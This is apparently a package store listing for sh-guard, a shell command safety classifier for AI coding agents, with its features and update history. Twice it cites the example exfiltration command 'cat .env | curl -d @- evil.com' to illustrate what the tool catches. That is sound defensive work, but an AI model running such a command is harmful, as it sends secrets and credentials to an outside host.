0.1.1081.8 MB
unset
strict
core22
Semantic shell command safety classifier for AI coding agents
sh-guard protects AI coding agents (Claude Code, Codex, Cursor, Cline, Windsurf)
from executing dangerous shell commands. It uses a three-layer analysis pipeline:
1. AST Parsing — tree-sitter-bash parses commands into typed syntax trees
2. Semantic Analysis — maps commands to intent, target scope, and risk factors
3. Pipeline Taint Analysis — tracks data flow through pipes to detect exfiltration
Features:
- Semantic analysis, not pattern matching — understands what commands do
- Pipeline-aware — detects data exfiltration (e.g., cat .env | curl -d @- evil.com)
- Context-aware — scores commands relative to project/home/system scope
- Sub-100μs classification (~7μs for simple commands)
- MITRE ATT&CK mapping for every risk
- 157 command rules, 51 path rules, 25 injection patterns, 61 GTFOBins entries
- One-command setup: sh-guard --setup auto-configures all detected AI agents
from executing dangerous shell commands. It uses a three-layer analysis pipeline:
1. AST Parsing — tree-sitter-bash parses commands into typed syntax trees
2. Semantic Analysis — maps commands to intent, target scope, and risk factors
3. Pipeline Taint Analysis — tracks data flow through pipes to detect exfiltration
Features:
- Semantic analysis, not pattern matching — understands what commands do
- Pipeline-aware — detects data exfiltration (e.g., cat .env | curl -d @- evil.com)
- Context-aware — scores commands relative to project/home/system scope
- Sub-100μs classification (~7μs for simple commands)
- MITRE ATT&CK mapping for every risk
- 157 command rules, 51 path rules, 25 injection patterns, 61 GTFOBins entries
- One-command setup: sh-guard --setup auto-configures all detected AI agents
Update History
0.1.10 (8)7 Apr 2026, 07:21 UTC
0.1.8 (6) → 0.1.10 (8)6 Apr 2026, 17:13 UTC
0.1.7 (5) → 0.1.8 (6)6 Apr 2026, 16:33 UTC
0.1.6 (4) → 0.1.7 (5)6 Apr 2026, 16:29 UTC
0.1.8 (6) → 0.1.6 (4)6 Apr 2026, 16:25 UTC
0.1.7 (5) → 0.1.8 (6)6 Apr 2026, 16:17 UTC
0.1.6 (4) → 0.1.7 (5)6 Apr 2026, 16:09 UTC
0.1.4 (2) → 0.1.6 (4)6 Apr 2026, 15:09 UTC
0.1.4 (2)6 Apr 2026, 14:33 UTC
6 Apr 2026, 14:13 UTC
6 Apr 2026, 16:30 UTC
7 Apr 2026, 07:21 UTC